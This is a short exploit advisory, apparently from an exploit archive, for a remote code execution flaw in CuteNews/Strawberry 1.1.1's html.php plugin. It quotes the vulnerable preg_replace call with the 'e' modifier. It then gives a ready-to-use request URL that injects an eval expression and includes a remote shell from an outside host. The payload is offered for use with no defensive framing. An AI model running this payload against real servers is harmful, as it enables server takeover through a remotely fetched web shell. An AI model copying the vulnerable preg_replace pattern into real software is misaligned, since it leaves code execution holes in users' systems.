id: 2456
date: 01/06/2008
title: CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability
author: Eugene Minaev
cves: 

=============================================================
CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability
=============================================================



----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]

							Strawberry (CuteNews) Remote Code Execution
							
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		Preg_replace with 'e' modifier allows code execution
		<?php

		$source = htmlspecialchars($text);

		$source = preg_replace(
		'/<!--(.*?)-->/es',
		'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".
		str_replace("<","<<!-- -->",
		str_replace("=","=<!-- -->",
		"$1")).
		"--></span>"',
		$source);  

		?>
		
		strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');
		

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]



#  0day.today [2023-03-24]  #